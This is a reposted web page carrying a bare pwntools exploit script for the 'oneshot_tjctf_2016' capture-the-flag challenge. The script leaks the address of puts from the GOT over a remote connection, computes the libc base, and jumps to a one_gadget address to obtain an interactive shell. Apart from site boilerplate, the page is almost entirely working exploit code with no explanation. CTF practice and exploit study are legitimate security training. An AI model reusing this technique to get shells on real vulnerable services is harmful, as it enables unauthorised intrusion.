码迷,mamicode.com
首页 > 其他好文 > 详细

oneshot_tjctf_2016

时间:2020-08-04 14:09:58      阅读:90      评论:0      收藏:0      [点我收藏+]

标签:read   inter   base   RoCE   line   put   nod   exp   ADG   

exp

from pwn import *

#context.log_level =‘debug‘

elf = ELF(‘./oneshot_tjctf_2016‘)
#io = process(‘./oneshot_tjctf_2016‘)
io = remote(‘node3.buuoj.cn‘,‘26930‘)
puts_got = elf.got[‘puts‘]
libc = ELF(‘./libc/libc-2.23.so‘)

one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]

io.sendlineafter(‘Read location?‘,str(puts_got))
io.recvuntil(‘0x0000‘)
puts_addr = int(io.recvuntil(‘\n‘),16)

print ‘puts_addr‘ + hex(puts_addr)
libcbase = puts_addr - libc.symbols[‘puts‘]
onegadget = libcbase + one_gadget[0]

io.sendline(str(onegadget)) 

io.interactive()

oneshot_tjctf_2016

标签:read   inter   base   RoCE   line   put   nod   exp   ADG   

原文地址:https://www.cnblogs.com/luoleqi/p/13432762.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!